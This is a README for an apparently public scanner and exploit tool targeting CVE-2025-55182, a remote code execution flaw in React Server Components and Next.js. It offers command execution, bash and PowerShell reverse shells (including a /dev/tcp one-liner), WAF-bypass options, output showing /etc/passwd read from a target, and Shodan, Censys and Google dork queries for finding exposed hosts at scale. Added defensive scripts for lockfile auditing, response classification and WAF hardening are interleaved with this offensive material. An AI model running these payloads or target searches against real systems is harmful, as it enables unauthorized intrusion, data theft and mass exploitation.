This tool is designed for security researchers and penetration testers to detect and exploit the CVE-2025-55182 vulnerability in Next.js/React RSC applications. It provides multiple scanning modes, exploitation features, and WAF bypass techniques.
- Multiple Scanning Modes: choose between `rce`, `safe`, and `vercel_bypass` modes.
- Easy Exploitation: execute commands or get a reverse shell on vulnerable targets.
- Custom Payloads: provide custom payloads as a string or from a file.
- WAF Bypass: techniques to bypass Web Application Firewalls.
- Fast and Concurrent: scans multiple targets using asyncio.
- Verbose Output: polished and detailed output for easy debugging.
- Colored Output: for better readability.
- Automated OS Detection: automatically detects the target's operating system (Linux/Windows) for smarter exploitation, especially for reverse shells.
| Category | Information |
|---|---|
| Published | 2025-12-03 |
| Base Score | 10.0 (CRITICAL) |
| Researcher | Lachlan Davidson (https://github.com/lachlan2k) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Description | A critical Remote Code Execution (RCE) vulnerability in React Server Components. Applications using React's server-side runtime, including frameworks like Next.js, are affected. The issue is caused by unsafe deserialization of untrusted "Flight" protocol data, allowing an attacker to achieve pre-authentication code execution on the server. Updating to patched React and framework versions is required. |
| EPSS Score | 27.81% (Probability of exploitation) |
| CISA KEV Catalog | Listed: Yes, Ransomware: Unknown |
| HackerOne Hacktivity | Rank: 1, Reports: 92 |
| Patching Priority | A+ |
This vulnerability affects the following versions:
- React (Server Components runtime): 19.0.0, 19.1.0, 19.1.1, and 19.2.0
- Next.js: ≥14.3.0-canary.77, and the 15.x and 16.x releases published before the fix
- Other frameworks using RSC: React Router (RSC mode), Waku, Redwood SDK, and various RSC bundler plugins
The following packages are also affected:
- `react-server-dom-parcel`
- `react-server-dom-turbopack`
- `react-server-dom-webpack`
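Before pointing a scanner at your own estate it is cheaper to check lockfiles. The script below is an added example, not part of this tool: it walks the `packages` map of a `package-lock.json` and flags `next` and the three `react-server-dom-*` packages against the affected ranges listed above. The exact React versions and the `14.3.0-canary.77` lower bound come from this README; the first patched Next.js release per minor line (`NEXT_FIXED`) is an assumption taken from the vendor advisory and should be re-checked there. The sample lockfile is constructed, not from a real project.

```python
"""Audit a package-lock.json for the versions this README lists as affected.

Added example (not the l0n3m4n tool's code). Affected ranges follow the
README; NEXT_FIXED is an assumption taken from the Next.js advisory.
"""
import json
import re

AFFECTED_RSC_PACKAGES = {"react-server-dom-webpack",
                         "react-server-dom-turbopack",
                         "react-server-dom-parcel"}
AFFECTED_RSC_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}  # from the README
NEXT_FIRST_AFFECTED = "14.3.0-canary.77"                            # from the README
# Assumption: first patched release in each affected Next.js minor line.
NEXT_FIXED = ["15.0.5", "15.1.9", "15.2.6", "15.3.6", "15.4.8", "15.5.7", "16.0.7"]

_VER_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+.*)?$")


def _ident(part):
    # Numeric prerelease identifiers sort numerically and before alphanumeric ones.
    return (0, int(part), "") if part.isdigit() else (1, 0, part)


def parse_version(text):
    """Tuple that orders like semver: 14.3.0-canary.76 < 14.3.0-canary.77 < 14.3.0."""
    m = _VER_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4)
    # A release sorts after every prerelease that shares its core.
    tag = (1, ()) if pre is None else (0, tuple(_ident(p) for p in pre.split(".")))
    return core + (tag,)


def next_is_affected(version):
    """True if this Next.js version falls in an affected range."""
    v = parse_version(version)
    major, minor = v[0], v[1]
    if major < 14:
        return False
    if major == 14:
        # Only the 14.3.0 canary line from canary.77 onward.
        return v >= parse_version(NEXT_FIRST_AFFECTED)
    fixed = sorted(parse_version(f) for f in NEXT_FIXED if parse_version(f)[0] == major)
    if not fixed:
        return False                 # major not covered by the advisory; no claim made
    same_line = [f for f in fixed if f[1] == minor]
    if same_line:
        return v < same_line[0]      # older than the fix for its own minor line
    return v < fixed[0]              # no fix listed for this minor: affected only if older than the oldest fix


def rsc_is_affected(name, version):
    return name in AFFECTED_RSC_PACKAGES and version.strip() in AFFECTED_RSC_VERSIONS


def audit_lockfile(lock_text):
    """Return {package: (version, affected)} for next and react-server-dom-*."""
    lock = json.loads(lock_text)
    findings = {}
    for path, meta in lock.get("packages", {}).items():
        name = path.rsplit("node_modules/", 1)[-1]   # also handles nested node_modules
        version = meta.get("version")
        if not version:
            continue
        if name == "next":
            findings[name] = (version, next_is_affected(version))
        elif name in AFFECTED_RSC_PACKAGES:
            findings[name] = (version, rsc_is_affected(name, version))
    return findings


# Constructed sample lockfile (not taken from any real project).
SAMPLE_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.1.0"},
        "node_modules/next": {"version": "15.5.6"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/some-lib/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
    },
})

if __name__ == "__main__":
    for name, (ver, bad) in sorted(audit_lockfile(SAMPLE_LOCK).items()):
        print(f"{name:<28} {ver:<16} {'AFFECTED' if bad else 'ok'}")
```

Run it against a real lockfile with `audit_lockfile(open("package-lock.json").read())`; canary and other prerelease builds of the `react-server-dom-*` packages are not in the README's list and are therefore not flagged by `rsc_is_affected`.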
git clone https://github.com/l0n3m4n/CVE-2025-55182.git
cd CVE-2025-55182
# Create a virtual environment
python3 -m venv venv-55182
source venv-55182/bin/activate
# Install dependencies
pip install -r requirements.txt
python3 CVE-2025-55182.py -h
__________ __ ________ _________.__ .__ .__
\______ \ ____ _____ _____/ |_\_____ \ / _____/| |__ ____ | | | |
| _// __ \\__ \ _/ ___\ __\/ ____/ \_____ \ | | \_/ __ \| | | |
| | \ ___/ / __ \\ \___| | / \ / \| Y \ ___/| |_| |__
|____|_ /\___ >____ /\___ >__| \_______ \/_______ /|___| /\___ >____/____/
\/ \/ \/ \/ \/ \/ \/ \/
Author: l0n3m4n | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit
usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
[-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]
Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications
options:
-h, --help show this help message and exit
-u, --url URL Single URL to scan or exploit.
-f, --file FILE File containing a list of URLs to scan/exploit.
Exploitation Options:
-c, --command COMMAND Command to execute on the target(s).
-p, --payloads PAYLOAD Custom payload to execute on the target(s). Can be a string or a
file path.
-r, --reverse-shell LHOST:LPORT Attempt a reverse shell.
Scanning Options:
-sm, --scan-mode MODE Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
rce)
-wb, --waf-bypass Add junk data to the request to bypass WAFs.
-wbs, --waf-bypass-size KB Size of junk data in KB (default: 128).
-wbu, --waf-bypass-utf16le Use UTF-16LE encoding to bypass WAFs.
General Options:
-o, --output FILE File to save vulnerable URLs from scans.
-t, --threads NUM Number of concurrent threads (default: 10).
-T, --timeout SEC Request timeout in seconds (default: 10).
-P, --proxy URL Proxy to use (e.g., http://127.0.0.1:8080).
-H, --header HEADER Add custom headers (e.g., 'Cookie: session=...').
-v, --verbose Enable verbose output for success/failed/non-vulnerable checks.
Scan modes (`-sm`):
- `rce` (default): Active scan mode; executes an `echo` command to confirm the vulnerability. This is the most reliable method, but it may leave logs on the target system.
- `safe`: Side-channel scan mode; does not execute commands. It checks for a specific error message (`E{"digest"`) to determine if the target is vulnerable. This is safer than `rce` mode, but may be less reliable.
- `vercel_bypass`: Uses a specific payload to bypass Vercel's WAF and checks for the command output in the `X-Action-Redirect` header.
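The three modes differ only in where they look for their indicator, and none of them can rely on the status code: in the sample runs further down, both the vulnerable Next.js host and the Cloudflare "Worker threw exception" page answer with HTTP 500. The following is an added example, not the tool's own code, that applies each mode's indicator to constructed responses (the marker string, the header values and the bodies are made up for the demo, and the digest body is a placeholder, not a real Flight response):

```python
"""Apply the rce / safe / vercel_bypass indicators to HTTP responses.

Added example, not the tool's code. Sample responses are constructed.
"""
import re

# Header fingerprints of a Next.js origin (both appear in the verbose output below).
NEXT_FINGERPRINTS = {
    "x-powered-by": re.compile(r"next\.js", re.I),
    "vary": re.compile(r"\bRSC\b.*Next-Router-State-Tree", re.I),
}
DIGEST_MARKER = 'E{"digest"'   # the error fragment the `safe` mode looks for


def _lower(headers):
    return {k.lower(): v for k, v in headers.items()}


def looks_like_nextjs(headers):
    """True when the response carries a Next.js header fingerprint."""
    h = _lower(headers)
    return any(name in h and rx.search(h[name]) for name, rx in NEXT_FINGERPRINTS.items())


def classify(mode, status, headers, body, marker=None):
    """Return 'vulnerable', 'not_vulnerable' or 'inconclusive' for one response.

      rce           -> the echoed marker must appear in the body
      safe          -> the digest error fragment must appear in the body
      vercel_bypass -> the echoed marker must appear in X-Action-Redirect
    The status code is never the primary signal: every 500 below is treated
    the same way until an indicator settles it.
    """
    if status < 0:
        return "inconclusive"          # transport failure (timeout, refused): nothing to judge
    h = _lower(headers)
    if mode in ("rce", "vercel_bypass"):
        if not marker:
            raise ValueError(f"{mode} mode needs the echo marker used in the request")
        haystack = body if mode == "rce" else h.get("x-action-redirect", "")
        return "vulnerable" if marker in haystack else "not_vulnerable"
    if mode == "safe":
        if DIGEST_MARKER in body:
            return "vulnerable"
        # A 500 from a CDN edge (Cloudflare "Worker threw exception") is not
        # evidence either way: the request may never have reached the origin.
        if status == 500 and not looks_like_nextjs(headers):
            return "inconclusive"
        return "not_vulnerable"
    raise ValueError(f"unknown scan mode {mode!r}")


# Constructed sample responses (not captured from any real host).
MARKER = "RSC55182CHECK"
NEXT_HEADERS = {"X-Powered-By": "Next.js", "Vary": "RSC, Next-Router-State-Tree",
                "Content-Type": "text/html; charset=utf-8"}
NEXT_RCE_BODY = f"{MARKER}\n<!DOCTYPE html><html>...</html>"
NEXT_DIGEST_BODY = 'E{"digest":"1234567890"}\n'          # placeholder, not real Flight output
CF_HEADERS = {"Server": "cloudflare", "Content-Type": "text/html; charset=UTF-8"}
CF_BODY = "<title>Worker threw exception | example.com | Cloudflare</title>"
VERCEL_HEADERS = {"X-Action-Redirect": f"/out/{MARKER}", "Vary": "RSC, Next-Router-State-Tree"}

SAMPLES = [
    ("rce", 500, NEXT_HEADERS, NEXT_RCE_BODY),
    ("rce", 500, CF_HEADERS, CF_BODY),
    ("safe", 500, NEXT_HEADERS, NEXT_DIGEST_BODY),
    ("safe", 500, CF_HEADERS, CF_BODY),
    ("vercel_bypass", 303, VERCEL_HEADERS, ""),
    ("rce", -1, {}, ""),
]


def run_samples():
    """Return [(mode, status, verdict)] for the constructed samples."""
    return [(m, s, classify(m, s, h, b, marker=MARKER)) for m, s, h, b in SAMPLES]


if __name__ == "__main__":
    for mode, status, verdict in run_samples():
        print(f"{mode:<14} status={status:<4} -> {verdict}")
```

The distinction between `not_vulnerable` and `inconclusive` is the one worth carrying into your own reporting: a 500 with no Next.js fingerprint means the edge answered, not that the origin is patched, so such hosts belong on a retry list rather than in the clean column.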
# Scan a single URL with the default rce check
python3 CVE-2025-55182.py -u http://target.com
# Scan a list of URLs with the `safe` mode and 20 threads
python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20
# Scan with Vercel WAF bypass mode and save vulnerable URLs to a file
python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt
# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb
# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"
# Use a custom payload from a file (Windows target)
python3 CVE-2025-55182.py -u http://target.com -p windows_revshell.ps1
# Get a reverse shell (linux default reverse shell)
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444
# Get a reverse shell using a payload file (linux target)
python3 CVE-2025-55182.py -u http://target.com -p linux_revshell.sh
# Force a windows reverse shell payload if auto-detection fails
python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 --os windows
# Intercept in Burpsuite
python3 CVE-2025-55182.py -u http://target.com -wbu -P http://127.0.0.1:8080
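The two WAF options above work against two common weaknesses in request-body inspection: rules that only look at the first few kilobytes (`-wb` pushes the payload past that window with junk, 128 KB by default) and rules that byte-match a UTF-8 signature (`-wbu` re-encodes the body as UTF-16LE so the same characters no longer form the same bytes). The script below is an added example, not the tool's code and not its real request format: a placeholder token stands in for the payload, and a naive inspector is placed beside a normalising one so you can see which evasions each catches.

```python
"""Naive vs. normalising body inspection against -wb style padding and -wbu style UTF-16LE.

Added example, not the tool's code. The body is filler plus a placeholder
token; it is not the tool's actual request format.
"""

SIGNATURE = "FORBIDDEN_TOKEN"   # placeholder for whatever string a WAF rule matches


def build_body(token, junk_kb=0, utf16le=False):
    """Shape a body the way -wb (junk_kb KiB of filler first) and -wbu
    (UTF-16LE encoding) do; the token stands in for the real payload."""
    text = "A" * (junk_kb * 1024) + token
    return text.encode("utf-16-le" if utf16le else "utf-8")


def naive_waf_blocks(body, inspect_limit=8 * 1024):
    """Weak rule: byte-match the UTF-8 signature inside the first N bytes only."""
    return SIGNATURE.encode("utf-8") in body[:inspect_limit]


def _charset_from(content_type):
    """Pull charset=... out of a Content-Type header, if declared."""
    if not content_type:
        return None
    for param in content_type.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        if key.strip().lower() == "charset":
            return value.strip().strip('"').lower()
    return None


def _looks_utf16le(body, sample=256):
    """Sniff UTF-16LE: for ASCII-range text every odd byte is 0x00."""
    odd = body[:sample][1::2]
    return len(odd) >= 2 and odd.count(0) / len(odd) > 0.9


def hardened_waf_blocks(body, content_type=None, max_body=1024 * 1024):
    """Normalise, then match: decode with the declared charset, with UTF-16LE
    when the bytes look like it, and with UTF-8. Oversize bodies are rejected
    (fail closed) instead of having their uninspected tail passed through."""
    if len(body) > max_body:
        return True
    encodings = []
    declared = _charset_from(content_type)
    if declared:
        encodings.append(declared)
    if _looks_utf16le(body):
        encodings.append("utf-16-le")
    encodings.append("utf-8")
    for enc in encodings:
        try:
            text = body.decode(enc)
        except (UnicodeDecodeError, LookupError):
            continue
        if SIGNATURE in text:
            return True
    return False


def compare():
    """Return {case: (naive_blocked, hardened_blocked)} for constructed bodies."""
    cases = {
        "plain":            (build_body(SIGNATURE), None),
        "junk_128kb":       (build_body(SIGNATURE, junk_kb=128), None),    # -wb default size
        "utf16le":          (build_body(SIGNATURE, utf16le=True), None),   # -wbu, charset undeclared
        "utf16le_declared": (build_body(SIGNATURE, utf16le=True), "text/plain; charset=utf-16le"),
        "junk_2mb":         (build_body(SIGNATURE, junk_kb=2048), None),   # exceeds the inspection budget
    }
    return {name: (naive_waf_blocks(body), hardened_waf_blocks(body, ct))
            for name, (body, ct) in cases.items()}


if __name__ == "__main__":
    for name, (naive, hard) in compare().items():
        print(f"{name:<18} naive={'block' if naive else 'PASS '}  hardened={'block' if hard else 'PASS '}")
```

The naive rule passes every evasion except the unmodified body. The hardened rule catches them because it inspects the whole body (or refuses it), decodes before matching, and does not trust the declared charset alone, which is the property to check in your own WAF configuration before treating a "blocked" verdict as protection.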
$ python3 CVE-2025-55182.py -u http://target.com
[+] VULNERABLE: http://target.com (Mode: rce)
$ python3 CVE-2025-55182.py -u http://target.com -v
[+] VULNERABLE: http://target.com - Status: 500 (Mode: rce) (OS: Linux, Web Server: nginx/1.29.3)
Target Information:
Detected OS: Linux
Server Software: next.js
Content Type: text/html; charset=utf-8
System Time: Sat, 06 Dec 2025 19:59:32 GMT
Response snippet:
HTTP/1.1 500 Internal Server Error
Date: Sat, 06 Dec 2025 19:59:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4615
Connection: keep-alive
X-Powered-By: Next.js
ETag: W/"1207-I2098797987"
Vary: RSC, Next-Router-State-Tree
$ python3 CVE-2025-55182.py -u https://tryhackme.com -v
[-] NOT VULNERABLE: https://tryhackme.com
[*] Verbose output for https://tryhackme.com:
Target Information:
Detected OS: Unknown
Server Software: cloudflare
Content Type: text/html; charset=UTF-8
System Time: Sat, 06 Dec 2025 19:59:32 GMT
Status Code: 500
Response Headers:
Date: Sat, 06 Dec 2025 19:59:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4615
Connection: keep-alive
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Referrer-Policy: same-origin
X-Frame-Options: SAMEORIGIN
Server: cloudflare
CF-RAY: 9a9e5d42b96204be-HKG
Response Body (first 500 chars):
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Worker threw exception | tryhackme.com | Cloudflare</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv
$ python3 CVE-2025-55182.py -u http://target.com -c "whoami && echo "" && cat /etc/passwd"
[*] Exploiting: https://target.com with command: whoami && echo "" && cat /etc/passwd
[+] COMMAND EXECUTED SUCCESSFULLY - Status: 500
----------------------------------------
nextjs
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
----------------------------------------
$ python3 CVE-2025-55182.py -u http://target.com -r 10.10.10.1:4444 -v
[*] Attempting reverse shell to 10.10.10.1:4444 from http://target.com
[*] Detected OS: Linux
[*] Using Linux (bash) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.
$ python3 CVE-2025-55182.py -u http://windows-target.com -r 10.10.10.1:4444 -v
[*] Attempting reverse shell to 10.10.10.1:4444 from http://windows-target.com
[*] Detected OS: Windows
[*] Using Windows (powershell) reverse shell payload.
[*] Please start your listener, e.g., nc -lvnp 4444
[*] Payload sent. Check your listener.
$ python3 CVE-2025-55182.py -u http://target.com/apps -c "id && ls -al" -wbu
[*] Exploiting: http://target.com/apps with command: id && ls -al
[+] COMMAND EXECUTED SUCCESSFULLY - Status: 500 (Web Server: nginx/1.29.3)
----------------------------------------
3443983266
----------------------------------------
$ python3 CVE-2025-55182.py -u http://target.com:3000 -c "id" -v
[*] Exploiting: http://target.com:3000 with command: id
[-] FAILED TO EXECUTE COMMAND
[*] Verbose output for http://target.com:3000:
Status Code: -1
Response Headers:
(No headers received)
Response Body (first 200 chars):
An error occurred: HTTPConnectionPool(host='target.com', port=3000): Max retries exceeded with url: / (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f846d6caa50>, 'Co
The tool comes with pre-made reverse shell payloads for Linux and Windows:
- `linux_revshell.sh`: Bash reverse shell.
- `windows_revshell.ps1`: PowerShell reverse shell.
Search queries for locating Next.js/React targets:
Shodan:
- `http.component:"next.js"`
- `http.favicon.hash:-1766382332` (Vercel favicon)
- `"x-powered-by: Next.js"`
Censys:
- `((Next.js) and services.software.product="Next.js") and services.port=3000`
- `services.http.response.body: "_next/static"`
- `host.services.endpoints.http.headers:(key:"Vary" and value:"RSC, Next-Router-State-Tree")`
Google dorks:
- `inurl:"/_next/static"`
- `intitle:"Next.js"`
- `site:com intitle:"Next.js"`
- `inurl:.com ("Next.js" OR "React")`
- `site:com ("Next.js" OR "_next/static")`
- `site:gov.cc ("Next.js" OR "React")`
- `site:com ("/_next/static" OR "/static/js")`
- `site:com ("React error" OR "Next.js error")`
Other search engines:
- `header:"x-powered-by: Next.js"`
- `app:"Next.js"`
- `http.body="react.production.min.js" || http.body="React.createElement(" || app="React Router" || app="React.js"`
- `vul.cve="CVE-2025-55182"`
- `app="NEXT.JS" || app="React.js"`
This tool is intended for educational and research purposes only. Do not use it on any system without explicit permission. The author is not responsible for any damage caused by the use of this tool.
PR are welcome :)

